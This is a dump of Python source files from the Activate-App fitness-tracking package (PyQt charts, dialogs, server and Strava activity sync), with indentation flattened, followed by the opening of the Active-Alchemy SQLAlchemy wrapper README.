self.activity_summary.show_map()
self.map_widget.remove_marker()
self.map_widget.remove_highlight()
def main_tab_switch(self, tab):
"""
Switch between the main tabs at the top.
Triggers the opened tab to update.
"""
tab_name = self.main_tabs.tabText(tab)
for action in (self.action_edit, self.action_add_photos, self.export_menu):
action.setEnabled(tab_name == "Activities")
self.activity_menu.setEnabled(tab_name != "Summary")
if tab_name == "Summary":
self.summary.summary_tab_switch()
elif tab_name == "Activities":
self.activity_summary.show_map()
if not self.activity_list_table.selectedItems():
self.activity_list_table.selectRow(0)
elif tab_name == "Social":
self.social_activity_summary.show_map()
self.social_tab_update()
else:
raise ValueError("Invalid tab")
def get_social_activities(self):
"""
Download all activities from each server.
Gets the activity list from the server, and then downloads each
activity. Also uploads missing activities.
"""
self.social_activities = activity_list.ActivityList([], None)
dialog = QtWidgets.QProgressDialog(
"Syncing",
"Cancel",
0,
len(self.settings.servers) * SYNC_PROGRESS_STEPS,
self,
)
dialog.setWindowModality(Qt.WindowModal)
dialog.setMinimumDuration(0)
dialog.forceShow()
for i, server in enumerate(self.settings.servers):
dialog.setLabelText(f"Getting activity list from {server.name}")
dialog.setValue(SYNC_PROGRESS_STEPS * i)
try:
server_activities = activity_list.from_serial(
serialise.loads(server.get_data("get_activities")), None
)
except connect.requests.RequestException:
continue
own_ids = {a.activity_id for a in self.activities}
dialog.setValue(round(SYNC_PROGRESS_STEPS * (i + 1 / 3)))
dialog.setLabelText(f"Syncing activities with {server.name}")
for j, activity_ in enumerate(server_activities):
activity_.server = server.name
if activity_.username == server.username:
aid = activity_.activity_id
if aid not in own_ids:
server.get_data(f"delete_activity/{aid}")
continue
own_ids.remove(aid)
try:
previous = self.social_activities.by_id(activity_.activity_id)
previous.server += f"\n{activity_.server}"
previous.username += f"\n{activity_.username}"
except KeyError:
self.social_activities.append(activity_)
dialog.setValue(
round(
SYNC_PROGRESS_STEPS
* (i + (1 + (j + 1) / len(server_activities)) / 3)
)
)
dialog.setValue(round(SYNC_PROGRESS_STEPS * (i + 2 / 3)))
own_ids |= self.unsynced_edited_activities
if not own_ids:
continue
dialog.setLabelText(f"Uploading activities to {server.name}")
for j, missing_id in enumerate(own_ids):
try:
server.upload_activity(self.activities.get_activity(missing_id))
with suppress(KeyError):
self.unsynced_edited_activities.remove(missing_id)
except connect.requests.RequestException:
break
dialog.setValue(
round(SYNC_PROGRESS_STEPS * (i + (2 + (1 + j) / len(own_ids)) / 3))
)
save_unsynced_edited(self.unsynced_edited_activities)
dialog.setValue(SYNC_PROGRESS_STEPS * len(self.settings.servers))
def social_tab_update(self):
self.get_social_activities()
self.social_tree.set_servers(self.settings.servers, self.social_activities)
self.social_activity_list.setUpdatesEnabled(False)
self.social_activity_list.setSortingEnabled(False)
self.social_activity_list.setRowCount(0)
self.social_activity_list.setRowCount(len(self.social_activities))
for row, activity_ in enumerate(self.social_activities):
self.social_activity_list.set_id_row(
activity_.activity_id, activity_.list_row, row
)
self.filter_social_activities()
self.social_activity_list.resizeColumnsToContents()
self.social_activity_list.default_sort()
def filter_social_activities(self):
self.social_activity_list.setUpdatesEnabled(False)
self.social_activity_list.filter_by_server(
self.social_tree.get_enabled_servers()
)
self.social_activity_list.setUpdatesEnabled(True)
@property
def unit_system(self):
system = units.UNIT_SYSTEMS[self.settings.unit_system]
for dimension, unit in self.settings.custom_units.items():
unit = units.UNIT_NAMES[unit]
system.units[dimension] = unit
return system
def activity_list_menu(self, event):
self.activity_menu.exec(event.globalPos())
def closeEvent(self, event):
self.activities.save()
return super().closeEvent(event)
def main():
"""Run the app and display the main window."""
app = QtWidgets.QApplication(sys.argv)
icon = QPixmap()
icon.loadFromData(
pkg_resources.resource_string("activate.resources", "icons/icon.png")
)
app.setWindowIcon(QIcon(icon))
app.setApplicationName("Activate")
app.setAttribute(Qt.AA_DisableWindowContextHelpButton)
main_window = MainWindow(activity_list.from_disk(paths.DATA))
main_window.showMaximized()
sys.exit(app.exec()) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/__init__.py | __init__.py |
import math
from collections import namedtuple
from datetime import datetime, timedelta
from itertools import zip_longest
from PyQt5 import QtChart, QtWidgets
from PyQt5.QtCore import QPointF, Qt, pyqtSignal
from PyQt5.QtGui import QPainter
from activate import number_formats, times, units
def axis_number_format(axis):
"""Format axis labels with the correct number of decimal places."""
interval = (axis.max() - axis.min()) / (axis.tickCount() - 1)
if interval.is_integer():
axis.setLabelFormat("%i")
else:
axis.setLabelFormat(f"%.{max(0, -math.floor(math.log10(interval)))}f")
def date_axis_format(difference: timedelta) -> str:
"""Get the formatting for a date axis based on its range."""
if difference >= timedelta(days=365):
return "MMM yyyy"
if difference >= timedelta(days=100):
return "MMMM"
if difference >= timedelta(days=5):
return "dd MMMM"
if difference >= timedelta(days=3):
return "hh:00 d MMM"
if difference >= timedelta(days=1):
return "hh:mm d MMM"
if difference >= timedelta(hours=12):
return "hh:mm"
return "hh:mm:ss"
class MinMax:
"""Keeps track of the minimum and maximum of some data."""
def __init__(self, *args):
if args:
try:
self.minimum = min(min(a) for a in args if a)
self.maximum = max(max(a) for a in args if a)
return
# No values given
except ValueError:
pass
self.minimum = None
self.maximum = None
def update(self, value):
"""Add a new value to the MinMax."""
if self.minimum is None:
self.minimum = value
self.maximum = value
self.minimum = min(self.minimum, value)
self.maximum = max(self.maximum, value)
@property
def range(self):
if self.minimum is None:
return None
return self.maximum - self.minimum
@property
def ratio(self):
if self.minimum is None:
return None
return self.maximum / self.minimum
def __bool__(self):
return self.minimum is not None and self.range > 0
def __repr__(self):
if self.minimum is None:
return f"{self.__class__.__qualname__}()"
return f"{self.__class__.__qualname__}(({self.minimum!r}, {self.maximum!r}))"
def data_to_points(data):
"""Convert a [series1, series2] of data to a list of QPointF."""
return [QPointF(*p) for p in zip(*data)]
series_gc_prevent = []
def create_axis(log=False):
if log:
axis = QtChart.QLogValueAxis()
axis.setMinorTickCount(-1)
axis.setLabelFormat("%g")
return axis
return QtChart.QValueAxis()
class ChartView(QtChart.QChartView):
mouse_moved = pyqtSignal(QPointF)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setMouseTracking(True)
def mouseMoveEvent(self, event):
self.mouse_moved.emit(self.chart().mapToValue(event.localPos()))
super().mouseMoveEvent(event)
class Chart(QtChart.QChart):
"""A chart with sensible defaults and extra functionality."""
def __init__(
self,
seriess,
widget,
unit_system,
title=None,
horizontal_ticks=16,
vertical_ticks=6,
horizontal_log=False,
vertical_log=False,
x_axis_label=True,
y_axis_label=True,
):
"""Create a new chart."""
self.widget = widget
self.unit_system = unit_system
self.horizontal_ticks = horizontal_ticks
self.vertical_ticks = vertical_ticks
self.horizontal_log = horizontal_log
self.vertical_log = vertical_log
self.x_axis_label = x_axis_label
self.y_axis_label = y_axis_label
super().__init__()
self.setAnimationOptions(self.SeriesAnimations)
self.widget.setRenderHint(QPainter.Antialiasing, True)
self.legend().hide()
x_axis = create_axis(horizontal_log)
y_axis = create_axis(vertical_log)
self.addAxis(x_axis, Qt.AlignBottom)
self.addAxis(y_axis, Qt.AlignLeft)
for series in seriess:
self.addSeries(series)
series.attachAxis(x_axis)
series.attachAxis(y_axis)
self.widget.setChart(self)
if title is not None:
self.setTitle(title)
def set_axis_dimensions(self, x_axis_dimension, y_axis_dimension):
if x_axis_dimension and self.x_axis_label:
self.x_axis.setTitleText(
self.unit_system.format_name_unit(x_axis_dimension)
)
if y_axis_dimension and self.y_axis_label:
self.y_axis.setTitleText(
self.unit_system.format_name_unit(y_axis_dimension)
)
def update_axis(self, direction, ticks, minimum, maximum):
"""Change an axis range to fit minimum and maximum."""
axis = self.axes(direction)[0]
if isinstance(axis, TimePeriodAxis):
axis.setRange(minimum, maximum)
elif isinstance(axis, QtChart.QValueAxis):
fake_axis = QtChart.QValueAxis()
fake_axis.setRange(minimum, maximum)
fake_axis.setTickCount(ticks)
fake_axis.applyNiceNumbers()
axis.setRange(fake_axis.min(), fake_axis.max())
axis.setTickCount(fake_axis.tickCount())
axis_number_format(axis)
elif isinstance(axis, QtChart.QLogValueAxis):
# Minimum must be decreased slightly to add the necessary extra tick
axis.setRange(minimum / 1.00001, maximum)
# For date axes in subclass
else:
axis.setRange(minimum, maximum)
axis.setTickCount(ticks)
def add_legend(self, names):
self.legend().show()
for name, series in zip(names, self.series()):
series.setName(name)
def remove_legend(self):
self.legend().hide()
def set_vertical_line(self, x):
x = self.mapToPosition(QPointF(x, 0)).x()
try:
self.line.setLine(x, 0, x, 999)
except AttributeError:
line = QtWidgets.QGraphicsLineItem(x, 0, x, 999)
self.widget.scene().addItem(line)
self.line = line
@property
def x_axis(self):
return self.axes(Qt.Horizontal)[0]
@property
def y_axis(self):
return self.axes(Qt.Vertical)[0]
class LineChart(Chart):
"""A chart with 1+ QLineSeries on it."""
def __init__(self, widget, unit_system, area=False, series_count=1, **kwargs):
"""Add a line chart to widget."""
seriess = []
for _ in range(series_count):
series = QtChart.QLineSeries()
if area:
area = QtChart.QAreaSeries()
area.setUpperSeries(series)
# Save series so it doesn't get garbage collected
series_gc_prevent.append(series)
series = area
seriess.append(series)
super().__init__(seriess, widget, unit_system, **kwargs)
def encode_data(self, data):
"""Convert data with a dimension to floats with correct units."""
# Convert units
data = zip(
*(
[
None if x is None else self.unit_system.encode(x, unit)
for x in series
]
for series, unit in data
)
)
# Get rid of Nones
return list(zip(*(p for p in data if None not in p)))
@property
def data_series(self):
return [
s.upperSeries() if isinstance(s, QtChart.QAreaSeries) else s
for s in self.series()
]
def clear(self):
for series in self.data_series:
series.setVisible(False)
def update(self, data):
"""
Change a line chart's data.
Input format:
(((x_values_0, x_unit), (y_values_0, y_unit)),
((x_values_1, x_unit), (y_values_1, y_unit)),
...
)
"""
if not data:
for series in self.data_series:
series.setVisible(False)
return
x_dimension = data[0][0][1]
y_dimension = data[0][1][1]
self.set_axis_dimensions(x_dimension, y_dimension)
# Convert to the correct units
data = [self.encode_data(d) for d in data]
# Extract 'real' series from an area chart
x_range = MinMax(*(d[0] for d in data))
y_range = MinMax(*(d[1] for d in data))
for data_part, series in zip_longest(data, self.data_series):
if data_part is None:
series.setVisible(False)
else:
series.setVisible(True)
series.replace(data_to_points(data_part))
# Snap axis minima to zero
if (
not self.horizontal_log
and x_range
and x_range.minimum != 0
and x_range.ratio > 3
):
x_range.minimum = 0
if (
not self.vertical_log
and y_range
and y_range.minimum != 0
and y_range.ratio > 3
):
y_range.minimum = 0
self.update_axis(
Qt.Horizontal, self.horizontal_ticks, x_range.minimum, x_range.maximum
)
self.update_axis(
Qt.Vertical, self.vertical_ticks, y_range.minimum, y_range.maximum
)
class LineChartSet:
"""A set of line charts that can be hidden and shown."""
def __init__(self, unit_system, container):
self.unit_system = unit_system
self.container = container
self.charts = {}
self.chart_views = {}
def add(self, name, area=False):
self.chart_views[name] = ChartView(self.container.parentWidget())
self.charts[name] = LineChart(
self.chart_views[name], self.unit_system, area=area
)
self.container.addWidget(self.chart_views[name], 1)
def __getitem__(self, name):
return self.charts[name]
def show(self, name):
self.chart_views[name].setVisible(True)
def hide(self, name):
self.chart_views[name].setVisible(False)
def update_show(self, name, data):
self[name].update(data)
self.show(name)
def show_line(self, x_value):
for chart in self.charts:
self.charts[chart].set_vertical_line(x_value)
def __repr__(self):
return f"<LineChartSet charts={self.charts!r}>"
class Histogram(Chart):
def __init__(self, zones, widget, unit_system):
"""Create a histogram."""
series = QtChart.QBarSeries()
bar_set = QtChart.QBarSet("", series)
series.append(bar_set)
series.setBarWidth(1)
super().__init__([series], widget, unit_system)
self.set_zones(zones)
def set_zones(self, zones):
        # Use QCategoryAxis instead of QBarCategoryAxis because the
        # former allows putting values between categories instead of
        # centring them.
cat_axis = self.x_axis
self.removeAxis(cat_axis)
cat_axis = QtChart.QCategoryAxis(self)
cat_axis.setLabelsPosition(QtChart.QCategoryAxis.AxisLabelsPositionOnValue)
# Hide the start value because zones[0] does its job
cat_axis.setStartValue(float("-inf"))
# Add initial label, handling negative infinity.
if zones[0] == float("-inf"):
cat_axis.append("\u2212\u221e", -0.5)
else:
zone_num = self.unit_system.encode(zones[0], "speed")
cat_axis.append(number_formats.maybe_as_int(zone_num), -0.5)
# Add axis labels
for position, zone in enumerate(zones[1:-1]):
zone_num = self.unit_system.encode(zone, "speed")
cat_axis.append(number_formats.maybe_as_int(zone_num), position + 0.5)
# Add final label. This should usually be infinity.
if zones[-1] == float("inf"):
cat_axis.append("\u221e", len(zones) - 1.5)
else:
zone_num = self.unit_system.encode(zones[-1], "speed")
cat_axis.append(number_formats.maybe_as_int(zone_num), len(zones) - 1.5)
cat_axis.setRange(-0.5, len(zones) - 1.5)
# One less bar than there are zones borders
series = self.series()[0]
bar_set = series.barSets()[0]
if bar_set.count() > len(zones) - 1:
bar_set.remove(0, bar_set.count() - len(zones) + 1)
elif bar_set.count() < len(zones) - 1:
for _ in range(len(zones) - 1 - bar_set.count()):
bar_set.append(0)
self.addAxis(cat_axis, Qt.AlignBottom)
series.attachAxis(cat_axis)
self.set_axis_dimensions("speed", "Time (min)")
def update(self, data):
"""Update the histogram data."""
series = self.series()[0]
bar_set = series.barSets()[0]
for position, amount in enumerate(data.values()):
bar_set.replace(position, units.MINUTE.encode(amount))
# Format the vertical axis
self.update_axis(Qt.Vertical, 15, 0, units.MINUTE.encode(max(data.values())))
class TimePeriodAxis(QtChart.QCategoryAxis):
def __init__(self, *args, **kwargs):
self.mode = "day"
super().__init__(*args, **kwargs)
def setRange(self, minimum, maximum):
super().setRange(minimum.timestamp(), maximum.timestamp())
def update_labels(self, minimum, maximum):
if self.mode == "auto":
if maximum - minimum > times.ONE_DAY * 500:
mode = "year"
elif maximum - minimum > times.ONE_DAY * 50:
mode = "month"
elif maximum - minimum > times.ONE_DAY * 10:
mode = "day"
else:
mode = "weekday"
else:
mode = self.mode
new_labels = times.get_periods(minimum, maximum, mode)
for label in self.categoriesLabels():
self.remove(label)
for position, label in new_labels:
self.append(label, position.timestamp())
class TimePeriodLineChart(LineChart):
"""A line chart with datetimes on the x axis."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.removeAxis(self.x_axis)
self.period_axis = TimePeriodAxis()
self.addAxis(self.period_axis, Qt.AlignBottom)
for series in self.series():
series.attachAxis(self.period_axis)
def encode_data(self, data):
"""
Convert the data provided to a more usable format.
Input format: ((x_values, "time"), (y_values, y_format))
Output format: (x_values, y_values)
The output values are in the correct units for display on the
chart.
"""
x_data = [self.unit_system.encode(x, data[0][1]) for x in data[0][0]]
y_data = [self.unit_system.encode(x, data[1][1]) for x in data[1][0]]
return (x_data, y_data)
def update_axis(self, direction, ticks, minimum, maximum):
"""Resize the chart axes."""
if minimum is None:
return
if direction == Qt.Horizontal:
minimum = datetime.fromtimestamp(minimum)
maximum = datetime.fromtimestamp(maximum)
self.period_axis.update_labels(minimum, maximum)
super().update_axis(direction, ticks, minimum, maximum)
class ProgressionChart(TimePeriodLineChart):
"""A chart to show total distance, time or climbing over time."""
YOption = namedtuple("YOption", ("function", "unit"))
Y_OPTIONS = {
"Distance": YOption(lambda a: a.distance, "distance"),
"Time": YOption(lambda a: a.duration.total_seconds(), "real_time"),
"Climb": YOption(lambda a: a.climb, "altitude"),
}
def update(self, summary_period, allowed_activity_types, y_mode, now, activities):
periods, data = activities.get_progression_data(
allowed_activity_types, summary_period, now, self.Y_OPTIONS[y_mode].function
)
if summary_period == "All Time":
self.period_axis.mode = "auto"
self.remove_legend()
else:
self.period_axis.mode = {
"Year": "month",
"Month": "day",
"Week": "weekday",
}[summary_period]
self.add_legend(periods)
super().update(
[((d[0], "date"), (d[1], self.Y_OPTIONS[y_mode].unit)) for d in data]
)
class FullProgressionChart(QtWidgets.QWidget):
y_changed = pyqtSignal()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.main_layout = QtWidgets.QHBoxLayout(self)
self.box = QtWidgets.QComboBox(self)
self.box.currentTextChanged.connect(self.change_y)
self.main_layout.addWidget(self.box)
self.chart_view = QtChart.QChartView(self)
self.main_layout.addWidget(self.chart_view)
def set_units(self, unit_system):
self.unit_system = unit_system
self.chart = ProgressionChart(
self.chart_view,
self.unit_system,
series_count=5,
vertical_ticks=8,
y_axis_label=False,
)
self.box.addItems(
[
self.unit_system.format_name_unit(
self.chart.Y_OPTIONS[option].unit, name=option
)
for option in self.chart.Y_OPTIONS
]
)
def change_y(self, new_value):
for option in self.chart.Y_OPTIONS:
if option in new_value:
self.y_option = option
self.y_changed.emit()
def update(self, *args, **kwargs):
self.chart.update(*args, y_mode=self.y_option, **kwargs) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/charts.py | charts.py |
import json
import re
from datetime import datetime
import requests
from bs4 import BeautifulSoup
import activate.activity
from activate.app import load_activity, sync
EFFORT_LEVEL_RE = re.compile(r'"perceivedExertion":(\d+)\.0,')
def strava_url(page: str) -> str:
return f"https://www.strava.com/{page}"
def get_strava_html(page: str, cookie: str) -> str:
response = requests.get(strava_url(page), cookies={"_strava4_session": cookie})
return response.text
def list_activities(cookie: str) -> dict:
response = requests.get(
strava_url("athlete/training?page=1"),
headers={"X-Requested-With": "XMLHttpRequest"},
cookies={"_strava4_session": cookie},
)
return {a["id"]: a for a in json.loads(response.text)["models"]}
def get_activity_data(strava_activity_id: int, cookie: str) -> requests.models.Response:
page = f"activities/{strava_activity_id}"
activity_file = requests.get(
strava_url(f"{page}/export_original"),
cookies={"_strava4_session": cookie},
stream=True,
)
return activity_file
def get_edit_page_data(strava_activity_id: int, cookie: str) -> tuple:
html = get_strava_html(f"activities/{strava_activity_id}/edit", cookie)
photo_urls = [
i.img["src"]
for i in BeautifulSoup(html, "html.parser").find_all("div", "image-wrap")
]
effort_level = EFFORT_LEVEL_RE.search(html)
if effort_level is not None:
effort_level = int(effort_level.group(1)) - 1
return photo_urls, effort_level
def sport(data):
return load_activity.convert_activity_type(data["type"], data["name"])
def update_local(activity, data):
activity.name = data["name"]
activity.sport = sport(data)
activity.flags["Commute"] = data["commute"]
activity.flags["Indoor"] = data["trainer"]
if activity.sport == "Run":
activity.flags["Treadmill"] = data["trainer"]
activity.flags["Race"] = data["workout_type"] in {1, 11}
activity.flags["Long Run"] = data["workout_type"] == 2
activity.flags["Workout"] = data["workout_type"] in {3, 12}
activity.description = (
data["description"] if data["description"] is not None else ""
)
def matches(activity, data):
return all(
(
datetime.fromisoformat(data["start_time"][:-5]) == activity.start_time,
sport(data) == activity.sport,
)
)
def sync_new(cookie, activities, sync_list):
"""
Download new activities from Strava.
Returns a generator. The first value is the number of items after
it. The other items are Activities.
"""
remote_activities = list_activities(cookie)
for activity in activities:
strava_id = sync_list.get("Strava", activity.activity_id)
if strava_id is None:
for remote_id, data in remote_activities.items():
if matches(activity, data):
sync_list.add("Strava", activity.activity_id, remote_id)
strava_id = remote_id
break
else:
continue
elif strava_id not in remote_activities:
continue
activity = activities.get_activity(activity.activity_id)
update_local(activity, remote_activities[strava_id])
activities.update(activity.activity_id)
activities.save_activity(activity.activity_id)
del remote_activities[strava_id]
yield len(remote_activities)
for strava_activity_id, data in remote_activities.items():
activity = activate.activity.from_track(
**sync.import_from_response(get_activity_data(strava_activity_id, cookie))
)
update_local(activity, data)
photo_urls, effort_level = get_edit_page_data(strava_activity_id, cookie)
activity.effort_level = effort_level
for url in photo_urls:
sync.add_photo_from_response(requests.get(url, stream=True), activity)
sync_list.add("Strava", activity.activity_id, strava_activity_id)
yield activity | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/sync/strava.py | strava.py |
import re
import shutil
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional
from uuid import UUID
from activate import serialise
from activate.app import files, load_activity, paths
from activate.app.sync import strava
FILENAME = re.compile(r'filename="(.*)"')
def download_response(response, path):
try:
filename = next(
FILENAME.finditer(response.headers["Content-Disposition"])
).group(1)
except KeyError:
filename = response.url.split("/")[-1]
filename = files.encode_name(filename, path)
with open(filename, "wb") as f:
response.raw.decode_content = True
shutil.copyfileobj(response.raw, f)
return filename
def add_photo_from_response(response, activity):
filename = download_response(response, paths.PHOTOS)
activity.photos.append(filename)
def import_from_response(response):
filename = download_response(response, paths.TRACKS)
activity = load_activity.load(filename)
activity["filename"] = filename
return activity
@dataclass
class SyncState:
state: Optional[defaultdict] = None
def ensure_loaded(self):
if self.state is not None:
return
try:
self.state = defaultdict(
dict, {UUID(k): v for k, v in serialise.load(paths.SYNC_STATE).items()}
)
except FileNotFoundError:
self.state = defaultdict(dict)
def write(self):
serialise.dump(
{str(k): v for k, v in self.state.items()}, paths.SYNC_STATE, gz=True
)
def add(self, service, activity_id, service_activity_id):
self.state[activity_id] = {service: service_activity_id}
def get(self, service, activity_id):
return self.state[activity_id].get(service)
def sync(self, cookies, activities):
"""
Download new activities.
Returns a generator. The first value is the number of items after
it. The other items are Activities.
"""
yield from strava.sync_new(cookies["Strava"], activities, self)
sync_state = SyncState() | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/sync/__init__.py | __init__.py |
import datetime
import PyQt5
from PyQt5 import QtWidgets
from activate import activity_types
from activate.app import paths
from activate.app.dialogs import FormDialog
from activate.app.widgets import ActivityFlagEdit, DurationEdit, EffortEdit, Form
DELETE_ACTIVITY = 222 # 0xDE[lete]
class ManualActivityDialog(FormDialog):
def __init__(self, *args, **kwargs):
layout = {
"Name": QtWidgets.QLineEdit(),
"Type": QtWidgets.QComboBox(),
"Distance": QtWidgets.QDoubleSpinBox(),
"Start Time": QtWidgets.QDateTimeEdit(),
"Duration": DurationEdit(),
"Ascent": QtWidgets.QDoubleSpinBox(),
"Flags": ActivityFlagEdit(),
"Effort": EffortEdit(),
"Description": QtWidgets.QPlainTextEdit(),
}
layout["Type"].currentTextChanged.connect(layout["Flags"].change_options)
layout["Type"].addItems(activity_types.TYPES)
layout["Distance"].setRange(0, 100000)
layout["Ascent"].setRange(0, 100000)
super().__init__(Form(layout), *args, **kwargs)
self.setWindowTitle("Manual Activity")
def accept(self):
if self.form.fields["Duration"].value() > datetime.timedelta(0):
super().accept()
class EditActivityDialog(FormDialog):
def __init__(self, *args, **kwargs):
layout = {
"Name": QtWidgets.QLineEdit(),
"Type": QtWidgets.QComboBox(),
"Flags": ActivityFlagEdit(),
"Effort": EffortEdit(),
"Description": QtWidgets.QPlainTextEdit(),
}
layout["Type"].currentTextChanged.connect(layout["Flags"].change_options)
layout["Type"].addItems(activity_types.TYPES)
super().__init__(Form(layout), *args, **kwargs)
self.setWindowTitle("Edit Activity")
self.add_delete_button()
def add_delete_button(self):
self.delete_button = QtWidgets.QPushButton("Delete Activity")
self.delete_button.setIcon(PyQt5.QtGui.QIcon.fromTheme("edit-delete"))
self.delete_button.clicked.connect(self.handle_delete_button)
self.main_layout.insertWidget(1, self.delete_button)
def apply_to_activity(self, data):
"""Apply the settings to an self.activity."""
self.activity.name = data["Name"]
self.activity.sport = data["Type"]
self.activity.description = data["Description"]
self.activity.flags = data["Flags"]
self.activity.effort_level = data["Effort"]
self.activity.save(paths.ACTIVITIES)
def handle_delete_button(self):
confirm_box = QtWidgets.QMessageBox()
confirm_box.setText(f"Are you sure you want to delete {self.activity.name}?")
confirm_box.setStandardButtons(
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No
)
result = confirm_box.exec()
if result == QtWidgets.QMessageBox.Yes:
self.done(DELETE_ACTIVITY)
def exec(self, activity):
self.activity = activity
result = super().exec(
{
"Name": self.activity.name,
"Type": self.activity.sport,
"Flags": self.activity.flags,
"Effort": self.activity.effort_level,
"Description": self.activity.description,
}
)
if isinstance(result, dict):
self.apply_to_activity(result)
return result
class EditManualActivityDialog(EditActivityDialog, ManualActivityDialog):
def __init__(self, *args, **kwargs):
ManualActivityDialog.__init__(self, *args, **kwargs)
self.setWindowTitle("Edit Activity")
self.add_delete_button()
def apply_to_activity(self, data):
super().apply_to_activity(data)
        self.activity.track.length = data["Distance"] * 1000
self.activity.track.start_time = data["Start Time"]
self.activity.track.elapsed_time = data["Duration"]
self.activity.track.ascent = data["Ascent"]
def exec(self, activity):
self.activity = activity
result = ManualActivityDialog.exec(
self,
{
"Name": self.activity.name,
"Type": self.activity.sport,
"Distance": self.activity.track.length / 1000,
"Start Time": self.activity.track.start_time,
"Duration": self.activity.track.elapsed_time,
"Ascent": self.activity.track.ascent,
"Flags": self.activity.flags,
"Effort": self.activity.effort_level,
"Description": self.activity.description,
},
)
if isinstance(result, dict):
self.apply_to_activity(result)
return result | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/dialogs/activity.py | activity.py |
import PyQt5
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon
from activate.app import connect, settings, widgets
from activate.app.dialogs import FormDialog
from activate.app.ui.settings import Ui_settings
from activate.app.widgets import Form
class AddServerDialog(FormDialog):
def __init__(self, *args, **kwargs):
layout = {
"Address": QtWidgets.QLineEdit(),
"Name": QtWidgets.QLineEdit(),
"Username": QtWidgets.QLineEdit(),
"Password": QtWidgets.QLineEdit(),
}
layout["Password"].setEchoMode(layout["Password"].Password)
super().__init__(Form(layout), *args, **kwargs)
self.setWindowTitle("Add Server")
class SettingsDialog(QtWidgets.QDialog, Ui_settings):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setupUi(self)
self.settings_tabs.setTabIcon(0, QIcon.fromTheme("settings-configure"))
self.settings_tabs.setTabIcon(1, QIcon.fromTheme("measure"))
self.settings_tabs.setTabIcon(2, QIcon.fromTheme("network-server"))
self.settings_tabs.setTabIcon(3, QIcon.fromTheme("folder-sync"))
self.add_server_button.setIcon(PyQt5.QtGui.QIcon.fromTheme("list-add"))
self.custom_units = widgets.CustomUnits(self)
self.units_tab_layout.addLayout(self.custom_units)
self.units_tab_layout.setAlignment(Qt.AlignTop)
def add_server(self):
result = AddServerDialog().exec({})
if not result:
return
self.server_table.add_row()
self.server_table.set_server(
self.server_table.rowCount() - 1, connect.Server(*result.values())
)
def load_from_settings(self, current_settings: settings.Settings):
"""Load a Settings object to the UI widgets."""
self.map_tiles_edit.setText(
current_settings.tiles if current_settings.tiles is not None else ""
)
self.cookie_edit.setText(
current_settings.cookie if current_settings.cookie is not None else ""
)
self.map_speed_edit.setValue(current_settings.map_speed)
self.unit_system.setCurrentText(current_settings.unit_system)
self.server_table.set_servers(current_settings.servers)
self.custom_units.set_units(current_settings.custom_units)
def get_settings(self) -> settings.Settings:
"""Get a Settings object from the UI widgets."""
tiles = self.map_tiles_edit.toPlainText()
if not tiles:
tiles = None
cookie = self.cookie_edit.text()
if not cookie:
cookie = None
return settings.Settings(
tiles=tiles,
map_speed=self.map_speed_edit.value(),
unit_system=self.unit_system.currentText(),
servers=self.server_table.get_servers(),
custom_units=self.custom_units.units_dict(),
cookie=cookie,
)
def exec(self, current_settings, page):
self.settings_tabs.setCurrentIndex(
("General", "Units", "Servers", "Sync").index(page)
)
self.load_from_settings(current_settings)
result = super().exec()
if not result:
return current_settings
new_settings = self.get_settings()
new_settings.save()
return new_settings | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/dialogs/settings.py | settings.py |
# Active-Alchemy
**Version 1.x.x**
---
Active-Alchemy is a wrapper around SQLAlchemy that makes it simple to use
your models in an active-record-like manner, while still using the SQLAlchemy `db.session` underneath.
Active-Alchemy was created as a solution to use my Flask application's models
without needing Flask-SQLAlchemy outside of Flask projects.
What you may like about Active-Alchemy:
- Just by instantiating with `ActiveAlchemy()`, ActiveAlchemy automatically creates
the session, model and everything necessary for SQLAlchemy.
- It provides easy methods such as `query()`, `create()`, `update()`, `delete()`,
to select, create, update, delete entries respectively.
- It automatically creates a primary key for your table
- It adds the following columns: `id`, `created_at`, `updated_at`, `is_deleted`, `deleted_at`
- On `delete()`, it soft-deletes the entry so it doesn't get queried, but the row still
exists in the database. This feature allows you to un-delete an entry
- It uses Arrow for DateTime
- DateTime is saved in UTC and uses the ArrowType from SQLAlchemy-Utils
- Added some data types: JSONType, EmailType, and all the other SQLAlchemy-Utils types
- db.now -> gives you the Arrow UTC type
- It is still SQLAlchemy. You can access all the SQLAlchemy awesomeness
---
## Quick Overview:
#### Create the model
from active_alchemy import ActiveAlchemy
db = ActiveAlchemy('sqlite://')
class User(db.Model):
name = db.Column(db.String(25))
location = db.Column(db.String(50), default="USA")
        last_access = db.Column(db.DateTime)
#### Retrieve all records
for user in User.query():
print(user.name)
#### Create new record
user = User.create(name="Mardix", location="Moon")
# or
user = User(name="Mardix", location="Moon").save()
#### Get a record by primary key (id)
user = User.get(1234)
#### Update record from primary key
user = User.get(1234)
if user:
user.update(location="Neptune")
#### Update record from query iteration
for user in User.query():
        user.update(last_access=db.utcnow())
#### Soft Delete a record
user = User.get(1234)
if user:
user.delete()
#### Query Records
users = User.query(User.location.distinct())
for user in users:
...
#### Query with filter
    users = User.query().filter(User.location == "USA")
    for user in users:
...
## How to use
### Install
pip install active_alchemy
### Create a connection
The `ActiveAlchemy` class is used to instantiate a SQLAlchemy connection to
a database.
from active_alchemy import ActiveAlchemy
    db = ActiveAlchemy("dialect+driver://username:password@host:port/database")
#### Databases Drivers & DB Connection examples
Active-Alchemy comes with `PyMySQL` and `PG8000` as drivers for MySQL
and PostgreSQL respectively, because they are pure Python. But you can use
other drivers for better performance. `SQLite` support is already built into Python.
**SQLite:**
from active_alchemy import ActiveAlchemy
db = ActiveAlchemy("sqlite://") # in memory
# or
db = ActiveAlchemy("sqlite:///foo.db") # DB file
**PostgreSql:**
from active_alchemy import ActiveAlchemy
db = ActiveAlchemy("postgresql+pg8000://user:password@host:port/dbname")
**PyMySQL:**
from active_alchemy import ActiveAlchemy
